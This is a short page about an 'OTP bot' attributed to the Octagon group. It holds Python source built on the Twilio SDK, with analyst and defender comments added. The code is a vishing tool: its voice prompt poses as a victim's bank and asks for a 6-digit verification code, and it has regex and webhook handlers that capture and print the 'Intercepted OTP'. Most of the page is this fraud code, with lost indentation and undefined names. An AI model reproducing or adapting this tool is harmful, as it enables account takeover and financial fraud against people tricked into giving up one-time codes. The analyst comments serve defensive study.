Octagon group releases OTP bot
from twilio.rest import Client
from twilio.twiml.voice_response import VoiceResponse, Say
import re
# Analyst summary: this listing is a phone-based social-engineering (vishing)
# sample built on the Twilio Python SDK. It has three parts: a regex that pulls
# a numeric code out of SMS bodies, a TwiML voice prompt that asks the called
# party to key in a 6-digit code, and a webhook section that reads the keyed
# digits. Indentation and the '#' markers on the original inline comments were
# lost in extraction; the code text below is reproduced exactly as found.
account_sid = '<your Twilio account SID>'
auth_token = '<your Twilio auth token>'
client = Client(account_sid, auth_token)
# Matches text containing "Your verification code is: <digits>" followed by
# whitespace; capture group 1 is the digit run.
message_regex = re.compile(r'.*?Your\s+verification\s+code\s+is:\s+(\d+)\s+.*', re.MULTILINE | re.DOTALL)
def handle_sms(message):
Extract OTP from SMS
# Reads message.body and prints the captured digits; nothing is stored or
# sent elsewhere in this listing.
match = message_regex.match(message.body)
if match:
otp = match.group(1)
Log OTP for later use
print(f'Intercepted OTP: {otp}')
def handle_call(call):
Generate TwiML response to deceive victim into giving OTP
# Defender note: the pretext is a spoken "bank verification" message followed
# by a keypad prompt. The gather step below accepts 6 digits and POSTs them to
# the relative path '/process_input'. A request to key a one-time code into a
# phone call is the observable signal for user-awareness and fraud-desk rules.
response = VoiceResponse()
response.say('Hello, this is your bank calling to verify your account. To proceed, please enter your verification code')
Store user input and log OTP
with response.gather(num_digits=6, action='/process_input', method='POST') as gather:
gather.say('Please enter your verification code followed by the pound sign')
Return TwiML response
return str(response)
def handle_input(input_data):
Extract OTP from user input
# Reads the 'Digits' key from the posted form data and prints it.
otp = input_data.get('Digits')
if otp:
Log OTP for later use
print(f'Intercepted OTP: {otp}')
# Listen for incoming SMS messages and calls
# Both list() calls enumerate resources on the account identified by
# account_sid above, so only messages and calls belonging to that account are
# visible to this script.
messages = client.messages.list()
for message in messages:
handle_sms(message)
calls = client.calls.list()
for call in calls:
response = handle_call(call)
Update call with TwiML response
client.calls(call.sid).update(twiml=response)
# Process user input
# NOTE(review): `request` and `twilio_request_validator` are neither imported
# nor defined in this listing; presumably a web-framework request object and
# Twilio's request validator, but the page does not show them.
if 'HTTP_X_TWILIO_SIGNATURE' in request.headers:
Verify request signature
signature = request.headers['HTTP_X_TWILIO_SIGNATURE']
url = request.url
params = request.form
twilio_request_validator.validate(signature, url, params)
Handle user input
input_data = request.form
handle_input(input_data)